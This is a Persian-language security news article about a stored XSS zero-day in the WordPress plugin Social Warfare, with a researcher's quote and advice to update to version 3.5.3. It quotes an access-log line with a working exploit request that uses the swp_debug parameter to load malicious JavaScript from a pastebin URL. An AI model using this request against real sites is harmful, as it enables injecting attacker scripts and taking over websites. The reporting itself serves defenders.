امکان تسخیر سایت‌های وردپرسی با آسیب‌پذیری روز صفرم XSS در پلاگین Social Share

محققان اخیراً آسیب‌پذیری حیاتی روزصفرمی را در پلاگین اشتراک‌گذاری اجتماعی وردپرس، به نام "Social Warfare" کشف نموده‌اند که به هکرها اجازه می‌دهد اسکریپت‌های مخرب را به سایت‌های وردپرسی آسیب‌پذیر تزریق نمایند. این آسیب‌پذیری در واقع یک نقص XSS ذخیره شده در پلاگین مذکور است که وب‌سایت‌های وردپرسی را در معرض خطر هک قرار می‌دهد.

Social Warfare، یک پلاگین اشتراک‌گذاری اجتماعی برای وردپرس است که توسط Warfare Plugins توسعه داده شده و به اشتراک‌گذاری اجتماعی بیشتر برای توسعه‌دهندگان وب‌سایت‌های مبتنی بر وردپرس کمک می‌کند که می‎‌‌تواند منجر به بالا رفتن ترافیک وب‎‌سایت گردد.
این پلاگین حاوی یک کد آسیب‌پذیر در برخی از ویژگی‌های دیباگینگ پلاگین است که اجازه می‌دهد پی‌لود مورد نظر در پایگاه داده سایت ذخیره شده و با هر درخواستی که برای مشاهده هر یک از صفحات ارسال می‌گردد بازیابی شود.
به گفته‌ی محققی به نام Sucuri، "قابلیت مذکور در هیچ جا به طور مستقیم استفاده نمی‌‍شود، و به پارامترهای مختلف $_GET برای اجرا وابسته است، این امر موجب می‌گردد اگر سایت شما با استفاده از این آسیب‌پذیری مورد حمله قرار گرفت به راحتی قابل دیدن باشد."
این آسیب‌پذیری روزصفرم بسیار جدی بوده و امکان به دست گرفتن کامل وب‎‌سایت آسیب‌پذیر را در محیط مرورگر برای مهاجمان فراهم می‌آورد.
مهاجمان در حال حاضر سوء‌استفاده از این آسیب‌پذیری را آغاز نموده و تعداد زیادی اکسپلویت را در سراسر جهان توزیع نموده‌اند.
همانطور که در زیر مشاهده می‌شود، تلاش‌های بسیاری از صدها آدرس IP برای سوءاستفاده از این آسیب‌پذیری صورت گرفته است:

۲۰۲.۲۵۴.۲۳۶.۴۹ - - [۲۱/Mar/2019:16:52:14 -0400] "GET ‎/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.‎1" 403 2669 "‎-" "Mozilla/5.‎0 (Windows NT 6.‎1;‎ Win64;‎ x64;‎ rv:64.‎0) Gecko/20100101 Firefox/64.‎0"

در این مورد، مهاجمان اسکریپت‌های جاوااسکریپت را از طریق بارگذاری آدرس زیر:

 https://pastebin.com/raw/0yJzqbYf

که حاوی پی‌لود مخرب است تزریق می‌نمایند.

اگر وب‌سایت در مقابل آسیب‌پذیری مذکور وصله نگردد، مهاجمان با استفاده از قابلیت‌های این حفره امنیتی حملات گسترده‌ای را علیه وب‌سایت‌های آسیب‌پذیر اجرا می‌نمایند.
۷۰،۰۰۰ وب‌سایت وجود دارند که به طور فعالانه از این پلاگین استفاده می‌کنند، وصله مربوطه برای این آسیب‌پذیری منتشر شده و اکیداً به کاربران توصیه می‌گردد که در اسرع وقت این پلاگین را به نسخه ۳.۵.۳ بروزرسانی نمایند.

منبع خبر:  https://gbhackers.com/zero-day-stored-xss-vulnerability/‎